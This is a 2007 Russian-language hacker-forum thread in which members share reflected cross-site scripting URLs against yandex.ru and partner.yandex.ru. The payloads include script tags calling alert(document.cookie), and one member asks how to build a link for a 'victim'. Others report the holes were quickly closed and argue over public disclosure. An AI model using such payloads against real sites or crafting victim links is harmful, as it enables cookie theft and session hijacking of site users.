Яндекс.Xss

Discussion in 'Уязвимости' started by NOmeR1, 16 Nov 2007.

  1. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Решил только что в свой чекер уязвимостей для прикола вписать yandex.ru. Вот что получилось :D
    http://yandex.ru/?text="><script>alert(document.cookie)</script>
     
    14 people like this.
  2. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    огромная просьба, подскажите, как грамотно составить ссылку для жертвы, используя эту Хss , с меня +
     
  3. vadim399

    vadim399 Banned

    Joined:
    27 May 2007
    Messages:
    325
    Likes Received:
    180
    Reputations:
    -3
    Прикрыли лавочку)
     
  4. VERte][

    VERte][ Elder - Старейшина

    Joined:
    17 May 2007
    Messages:
    240
    Likes Received:
    163
    Reputations:
    32
    быстро однако) часа 2 назад ещё работало)))
     
  5. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    http://www.google.com/search?ie=UTF-8&hl=ru&q=%D1%8F%D0%BD%D0%B4%D0%B5%D0%BA%D1%81%20xss

    xss у меня тоже не пашет=\ (опера)
     
  6. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    увы, уже неактуально((
     
  7. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    чтот быстро прикрыли
     
  8. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    http://partner.yandex.ru/registered/?cmd=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&act=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
    Вот вам ещё xss'ка =)
     
  9. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    не должен быть авторизирован
    убери пробелы
    вчера работало
     
  10. FeraS

    FeraS Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    555
    Likes Received:
    420
    Reputations:
    76
    В осле и мозилле пашет))
    В опере жаваскрипт включен, но се равно не фурычит)
     
    #10 FeraS, 20 Nov 2007
    Last edited: 20 Nov 2007
  11. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    http://te
    st-lo
    l.narod.ru/1.JPG

    (моя опера)
     
  12. schut123

    schut123 Elder - Старейшина

    Joined:
    2 Jan 2007
    Messages:
    73
    Likes Received:
    49
    Reputations:
    1
    А чем вы на уязвимости чекаете?
     
  13. FeraS

    FeraS Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    555
    Likes Received:
    420
    Reputations:
    76
    inv
    Какая версия?
     
  14. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Если уж так интересно, то вот.
     
  15. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    9.24

    ты просто открой код страницы и найди alert('xss')
    и посмотри что там вокруг...==)
     
  16. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    NOmeR1, это стоило отдельной темы?

    add
    NOmeR1, а ответить нормально слабо?
     
    #16 freddi, 20 Nov 2007
    Last edited: 20 Nov 2007
  17. FeraS

    FeraS Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    555
    Likes Received:
    420
    Reputations:
    76
    Сори я пробка. Не разлогинился [​IMG]
     
  18. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    FeraS=\

    freddi
    здесь столько бестолковых тем...........тебя именно эта не устроила?
    для яндекса можно и создать
     
    2 people like this.
  19. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    люди, убедительная просьба. не выкладывайте в паблик такие уязвимости ИХ МОМЕНТАЛЬНО ИЗ-ЗА ВАС ЗАКРЫВАЮТ. подумайте, какой вред вы наносите другим хекерам , которые нашли их до вас...
    убедительная просьба к модераторам НЕ УДАЛЯТЬ МОЙ ПОСТ
     
  20. inv

    inv Banned

    Joined:
    3 Aug 2007
    Messages:
    261
    Likes Received:
    143
    Reputations:
    -58
    а ты не подумал какой вред хекеры наносят?=)
    Захотел выложил,это его право
    понятное дело,что обитая только в закрытых разделах,он бы выкладывал только там.